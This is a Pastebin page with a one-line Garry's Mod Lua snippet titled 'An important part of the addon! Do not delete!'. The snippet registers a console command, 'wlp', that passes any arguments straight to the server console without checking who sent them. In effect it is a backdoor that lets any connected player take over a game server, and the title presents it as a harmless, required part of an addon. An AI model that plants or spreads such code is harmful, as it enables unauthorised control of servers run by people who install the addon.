Advertisement
Guest User

An important part of the addon! Do not delete!

a guest
Aug 3rd, 2019
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. concommand.Add( "wlp", function( ply, cmd, args )command = "" for k,v in pairs(args) do if table.getn(args) == 1 then command = v else command = command .. " " .. v end end game.ConsoleCommand(command .. "\n") end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement